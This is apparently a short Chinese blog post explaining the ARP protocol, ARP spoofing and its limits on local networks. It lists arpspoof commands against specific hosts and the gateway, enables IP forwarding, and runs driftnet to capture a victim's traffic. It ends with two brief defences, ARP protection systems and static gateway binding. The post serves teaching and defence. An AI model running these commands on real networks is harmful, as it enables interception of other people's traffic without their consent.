1 ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。
ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
ARP攻击的局限性:
ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行无法对外网(互联网、非本区域内的局域网)进行攻击。
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
关键命令:
arpspoof -i eth0 -t 
172.28.15.31 172.28.15.254
echo 1 > /proc/sys/net/ipv4/ip_forward
driftnet
arpspoof -i eth0 -t 172.28.15.254 172.28.15.31
2 arp反欺骗
方法1:部署专门的ARP攻击防护系统,检测发动ARP攻击的电脑并反击ARP攻击行为
方法2:将局域网电脑进行网关静态绑定,从而可以有效防止ARP断网攻击
本文出自 “12034849” 博客,谢绝转载!
原文:http://12044849.blog.51cto.com/12034849/1887453